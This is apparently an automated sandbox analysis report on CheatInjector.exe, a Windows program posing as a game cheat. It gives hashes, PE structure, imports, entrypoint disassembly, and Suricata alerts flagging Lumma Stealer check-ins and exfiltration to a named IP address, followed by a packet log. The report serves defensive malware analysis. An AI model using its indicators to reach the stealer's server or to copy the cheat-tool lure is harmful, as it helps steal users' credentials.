                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.9.2.4.6.7.3.3.3.7.1.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.9.2.4.6.8.3.8.0.5.9.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.b.5.5.7.2.d.-.d.c.7.5.-.4.c.9.0.-.9.3.1.7.-.b.e.f.f.f.d.b.2.e.1.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.0.7.1.6.7.8.-.4.7.e.f.-.4.7.6.1.-.b.4.5.5.-.3.6.a.b.3.6.e.3.d.f.5.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.h.e.a.t.I.n.j.e.c.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.n.t...E.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.b.4.-.0.0.0.1.-.0.0.1.4.-.0.9.1.f.-.4.c.1.0.6.4.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.0.0.0.0.9.0.4.!.0.0.0.0.2.0.0.e.c.1.4.a.4.c.5.9.5.7.6.f.2.8.8.b.3.f.8.6.0.2.1.d.0.d.4.b.7.c.1.6.b.c.f.5.

                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER27E2.tmp.dmp

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 05:01:07 2024, 0x1205a4 type
                                                              Category:dropped
                                                              Size (bytes):37142
                                                              Entropy (8bit):1.6842168506471353
                                                              Encrypted:false
                                                              SSDEEP:96:5c86oT6saCTkLre3kS5X17Yhi73CSSmt6Ais2A1B4OoU+5uWIkWIyUIExwROPJg:h6zwuZhOn3F1AxyOP
                                                              MD5:0D55C4B8CFCEC18F1A16C5F2570E661A
                                                              SHA1:3DC685EAEE982DA00A886A29AA02FC18F586A526
                                                              SHA-256:3E3FCA690D2186518C652C8868C71904B5E66C7E57C8A56600D1FF3F6245F0A9
                                                              SHA-512:33B27D104C91F3482F0109F882DFD864438522A7909B3A1CA02164F8AAEADD8E14C23AC6E04E7A25D26734F45B94A063DC778AA6B83AE2265126A5BD2380D42C
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:MDMP..a..... ........w.g........................X...............`...........T.......8...........T...............&.......................................................................................................eJ......x.......GenuineIntel............T............w.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2831.tmp.WERInternalMetadata.xml

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):8430
                                                              Entropy (8bit):3.69546068642165
                                                              Encrypted:false
                                                              SSDEEP:192:R6l7wVeJN+f6oIe6Y9XSU9X7gmff7SHprt89babVsfUUjm:R6lXJ06W6Y9SU9X7gmfzSQabufv6
                                                              MD5:3B48F45EA8E987B647888F41350E66A3
                                                              SHA1:1751F641B5BFA07592B33D0C2453BA846F297516
                                                              SHA-256:FFDEF58C1E714F37C4E3B1D337BB44BF6B2064102B27F6E3903FF1ECF4D90A66
                                                              SHA-512:7C0F646716C6172AA8BD5DF1CF1C3C660E4F9930628E450C62EE930A6929B33C28EE7056BF10E0D77C1766FAF2DB11FA853E8707BB1253465664D4AE45C5C704
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.9.6.<./.P.i.

                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2851.tmp.xml

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):4815
                                                              Entropy (8bit):4.492920740268877
                                                              Encrypted:false
                                                              SSDEEP:48:cvIwWl8zsBJg77aI9EPWpW8VYsYm8M4JNHFO+q8vZZQDU1d:uIjfTI7Ce7VcJqK7QDU1d
                                                              MD5:22E584FA07092DFEABFC44333D8E8390
                                                              SHA1:23E68929056BC586415E18CE159286631D2CD4CA
                                                              SHA-256:4DDE78723FA5DA062453909BB495A9AD79A9FDA54C0FB347B2002AC7F03EE4B7
                                                              SHA-512:FBEDE7D94D68025F0CB9EE3ED7D2153CF305F72F1043CDD04F4EA5841E5169EF438AE55191AB58179C0F3337EBA0A90626DC46F3C9DB7EABF707A0EC0DA1A93F
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559923" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                              C:\Users\user\Desktop\static.lib

                                                              Download File
                                                              Process:C:\Users\user\Desktop\CheatInjector.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):400
                                                              Entropy (8bit):1.0
                                                              Encrypted:false
                                                              SSDEEP:3:rj:X
                                                              MD5:8BD30F5E64692F2971D94D201A7BDDBC
                                                              SHA1:1445B76763A443E3660BF686365374B5AA0407EA
                                                              SHA-256:EF938B9C248649B6EB4C1532F87EF94A8179E15D56EB8BA68EF92BCE2E68B7C1
                                                              SHA-512:37B0A14A1A21FD74BAD140477BE394816CD11D6778DE1007963B1EB9B81C0E246E1D779B40D3D863A6CB150AA4D5904D7492F607A8BE054B2D0281A78319CE56
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                              File Type:MS Windows registry file, NT/2000 or above
                                                              Category:dropped
                                                              Size (bytes):1835008
                                                              Entropy (8bit):4.4659926583078775
                                                              Encrypted:false
                                                              SSDEEP:6144:JIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN1dwBCswSbv:6XD94+WlLZMM6YFH3+v
                                                              MD5:B5B5A84E684B461D998156ED8AB4C166
                                                              SHA1:761B2688477DD57EDEEA599AA8E5D951A5AB9834
                                                              SHA-256:3ECE0A608E6508E7D8DE5C7DBE6181AAF5A13658CCCD81C73A4B7D5FC0A3E824
                                                              SHA-512:AA568FD2AB119B56F3CF7992D4038E8433222DF5F4A74F49C5FE647F49CCEC4E51DDA5F64D33C017A3C9BA7DBED9B86B89C005AB233EF5E5F03C17638884118A
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...d'.................................................................................................................................................................................................................................................................................................................................................$........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.69074748041136
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:CheatInjector.exe
                                                              File size:539'648 bytes
                                                              MD5:9fb7da682b76acbdf560398aa193ff7a
                                                              SHA1:200ec14a4c59576f288b3f86021d0d4b7c16bcf5
                                                              SHA256:a37043d7bbd6e5f0f5e9caddc36de161c5287041cc46b09891f0ce65064de870
                                                              SHA512:40d2ad44e02e8fd0ae874f01130e72f22bd687f69198d84bea2328e64b2b34cf04fe6571c4dceff088a6367e9d52c4f4e6c776c99c24fab97f1ad7d3abdd5db0
                                                              SSDEEP:12288:23jd2h8A5Fa/5aZrpYyKqfxPpFUbHHSq96VNXKJPZci5:2EhSxure0x6ymWUMi5
                                                              TLSH:A9B4F111B1C0C073D57319320AF4E7B56F3EBD350EA16A9F67941BBE5F30280E625A6A
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.ni...:...:...:...;...:...;...:...;...:...;...:...;...:...;...:...:u..:...;^..:C..;...:C..:...:C..;...:Rich...:........PE..L..

                                                              File Icon

                                                              Icon Hash:90cececece8e8eb0

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x406e80
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x671BBDAC [Fri Oct 25 15:47:56 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:15c1a3252578de27fcd7c556fbfdb6ef

                                                              Entrypoint Preview

                                                              Instruction
                                                              call 00007FE1ED346106h
                                                              jmp 00007FE1ED34573Fh
                                                              push ebp
                                                              mov ebp, esp
                                                              mov eax, dword ptr [ebp+08h]
                                                              push esi
                                                              mov ecx, dword ptr [eax+3Ch]
                                                              add ecx, eax
                                                              movzx eax, word ptr [ecx+14h]
                                                              lea edx, dword ptr [ecx+18h]
                                                              add edx, eax
                                                              movzx eax, word ptr [ecx+06h]
                                                              imul esi, eax, 28h
                                                              add esi, edx
                                                              cmp edx, esi
                                                              je 00007FE1ED3458DBh
                                                              mov ecx, dword ptr [ebp+0Ch]
                                                              cmp ecx, dword ptr [edx+0Ch]
                                                              jc 00007FE1ED3458CCh
                                                              mov eax, dword ptr [edx+08h]
                                                              add eax, dword ptr [edx+0Ch]
                                                              cmp ecx, eax
                                                              jc 00007FE1ED3458CEh
                                                              add edx, 28h
                                                              cmp edx, esi
                                                              jne 00007FE1ED3458ACh
                                                              xor eax, eax
                                                              pop esi
                                                              pop ebp
                                                              ret
                                                              mov eax, edx
                                                              jmp 00007FE1ED3458BBh
                                                              push esi
                                                              call 00007FE1ED346406h
                                                              test eax, eax
                                                              je 00007FE1ED3458E2h
                                                              mov eax, dword ptr fs:[00000018h]
                                                              mov esi, 00483668h
                                                              mov edx, dword ptr [eax+04h]
                                                              jmp 00007FE1ED3458C6h
                                                              cmp edx, eax
                                                              je 00007FE1ED3458D2h
                                                              xor eax, eax
                                                              mov ecx, edx
                                                              lock cmpxchg dword ptr [esi], ecx
                                                              test eax, eax
                                                              jne 00007FE1ED3458B2h
                                                              xor al, al
                                                              pop esi
                                                              ret
                                                              mov al, 01h
                                                              pop esi
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              cmp dword ptr [ebp+08h], 00000000h
                                                              jne 00007FE1ED3458C9h
                                                              mov byte ptr [0048366Ch], 00000001h
                                                              call 00007FE1ED345ABCh
                                                              call 00007FE1ED3489A9h
                                                              test al, al
                                                              jne 00007FE1ED3458C6h
                                                              xor al, al
                                                              pop ebp
                                                              ret
                                                              call 00007FE1ED352068h
                                                              test al, al
                                                              jne 00007FE1ED3458CCh
                                                              push 00000000h
                                                              call 00007FE1ED3489B0h
                                                              pop ecx
                                                              jmp 00007FE1ED3458ABh
                                                              mov al, 01h
                                                              pop ebp
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              cmp byte ptr [0048366Dh], 00000000h
                                                              je 00007FE1ED3458C6h
                                                              mov al, 01h

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2dbcc0x3c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x850000x595.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x1bdc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2beb80x1c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2bdf80x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x240000x148.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x22f2e0x230006806fb945c9631245e7fdacd2a890e45False0.5811593191964286data6.64543086149956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x240000xa3280xa400e5b67c1f458916c2765ddcf8a9e5fa65False0.4328791920731707OpenPGP Public Key4.943867183484972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x2f0000x551780x542004961ddc44c8db4432c6c197f05b78540False0.9910992059806835DOS executable (COM)7.992517442948515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x850000x5950x60045e64a7f6ae1f88bd3582c477816961bFalse0.4420572916666667data3.9821233375152167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x860000x1bdc0x1c008335ec102bfed00989b5ce26588b6d9aFalse0.7571149553571429data6.516926500875983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x850a00x378dataEnglishUnited States0.46283783783783783
                                                              RT_MANIFEST0x854180x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                              Imports

                                                              DLLImport
                                                              USER32.dllwsprintfA
                                                              KERNEL32.dllTerminateProcess, WriteConsoleW, GetStdHandle, DeleteFileA, HeapAlloc, HeapFree, GetProcessHeap, GlobalFindAtomW, WriteConsoleA, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, SetEndOfFile, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, WriteFile, GetModuleFileNameW, ExitProcess, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, CreateFileW

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-26T07:01:09.388235+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.95.91443TCP
                                                              2024-10-26T07:01:09.388235+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.95.91443TCP
                                                              2024-10-26T07:01:10.712187+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732104.21.95.91443TCP
                                                              2024-10-26T07:01:10.712187+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.95.91443TCP
                                                              2024-10-26T07:01:14.734353+02002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449738104.21.95.91443TCP
                                                              2024-10-26T07:01:23.128913+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746104.21.95.91443TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 26, 2024 07:01:07.565939903 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:07.565988064 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:07.566063881 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:07.568555117 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:07.568572998 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:08.201050997 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:08.201127052 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:08.221256018 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:08.221297026 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:08.222237110 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:08.267378092 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:08.782516003 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:08.782563925 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:08.782854080 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:09.388289928 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:09.388590097 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:09.388699055 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:09.390044928 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:09.390095949 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:09.390126944 CEST49730443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:09.390145063 CEST44349730104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:09.452006102 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:09.452122927 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:09.452214956 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:09.452495098 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:09.452528954 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.295140028 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.295289040 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.297065020 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.297077894 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.297601938 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.299010992 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.299035072 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.299091101 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.712179899 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.712416887 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.712500095 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.712510109 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.712578058 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.712645054 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.712663889 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.712763071 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.712897062 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.712910891 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.714093924 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.714157104 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.714170933 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.767302990 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.767335892 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.814178944 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.827410936 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.827742100 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.827800035 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.827819109 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.828051090 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.828114033 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.828217030 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.828268051 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.828299046 CEST49732443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.828315020 CEST44349732104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.980027914 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.980115891 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:10.980211020 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.980534077 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:10.980568886 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:12.134910107 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:12.135001898 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:12.136595964 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:12.136625051 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:12.137547970 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:12.152946949 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:12.153086901 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:12.153215885 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:12.153292894 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:12.153318882 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:13.126399040 CEST44349734104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:13.126817942 CEST49734443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:13.238045931 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:13.238126040 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:13.238214970 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:13.238506079 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:13.238531113 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.135915995 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.136178017 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.152905941 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.152983904 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.153845072 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.204817057 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.269170046 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.269315004 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.269411087 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.734380007 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.734638929 CEST44349738104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.734698057 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.734699011 CEST49738443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.964379072 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.964446068 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:14.964557886 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.964833021 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:14.964864969 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:15.822877884 CEST44349740104.21.95.91192.168.2.4
                                                              Oct 26, 2024 07:01:15.822981119 CEST49740443192.168.2.4104.21.95.91
                                                              Oct 26, 2024 07:01:15.824074984 CEST49740443192.168.2.4104.21.95.91
